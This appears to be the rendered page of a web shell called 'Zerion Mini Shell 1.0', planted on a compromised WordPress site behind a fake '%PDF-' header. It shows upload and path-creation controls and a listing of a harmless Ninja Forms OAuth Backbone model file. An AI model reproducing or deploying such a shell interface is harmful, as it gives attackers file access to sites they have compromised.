%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/client/dashboard/models/
Upload File :
Create Path :
Current File : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/client/dashboard/models/oauthModel.js

define( [], function() {
  var model = Backbone.Model.extend( {
    defaults: {
      connected: null,
      connect_url: '',
    },

    url: function() {
      return ajaxurl + "?action=nf_oauth";
    },

    initialize: function() {
      /* ... */
    },

    /*
     * Use the `data` property of the response.
     */
    parse: function( response, options ){
        return response.data;
    }

  } );

  return model;
} );

Zerion Mini Shell 1.0